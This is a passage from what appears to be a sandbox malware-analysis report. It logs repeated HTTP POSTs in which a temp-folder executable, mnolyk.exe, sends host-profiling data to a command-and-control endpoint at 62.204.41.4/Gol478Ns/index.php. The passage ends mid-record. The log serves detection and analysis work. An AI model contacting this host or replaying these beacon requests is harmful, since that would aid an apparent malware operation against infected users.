                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.678633928 CET816INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            629192.168.2.45032462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:19.866230965 CET817OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.932579041 CET817INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            63192.168.2.44975862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:42.136396885 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.201607943 CET252INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            630192.168.2.45032562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:20.110521078 CET818OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.176888943 CET818INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            631192.168.2.45032662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:20.344532967 CET819OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.406809092 CET819INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            632192.168.2.45032762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:20.585581064 CET820OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.650650024 CET820INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            633192.168.2.45032862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:20.835288048 CET821OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.900088072 CET821INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            634192.168.2.45032962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:21.110663891 CET822OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.171921968 CET822INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            635192.168.2.45033062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:21.380450964 CET823OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.444879055 CET823INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            636192.168.2.45033162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:21.630470037 CET824OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.692974091 CET824INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            637192.168.2.45033262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:21.859052896 CET825OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.930166006 CET825INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            638192.168.2.45033362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:22.114217043 CET826OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.179193020 CET826INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            639192.168.2.45033462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:22.362338066 CET827OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.427120924 CET827INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            64192.168.2.44975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:42.369298935 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.432893991 CET253INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            640192.168.2.45033562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:22.600565910 CET828OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.665425062 CET828INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            641192.168.2.45033662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:22.842206955 CET829OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:22.905479908 CET829INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:22 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            642192.168.2.45033762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:23.085155964 CET830OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.153053045 CET830INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            643192.168.2.45033862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:23.333401918 CET831OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.396606922 CET831INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            644192.168.2.45033962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:23.560898066 CET832OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:23.628093004 CET832INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:23 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            65192.168.2.44976062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:42.602797985 CET254OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.665982008 CET254INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            66192.168.2.44976162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:42.845741987 CET255OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.909156084 CET255INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            67192.168.2.44976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:43.088897943 CET256OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
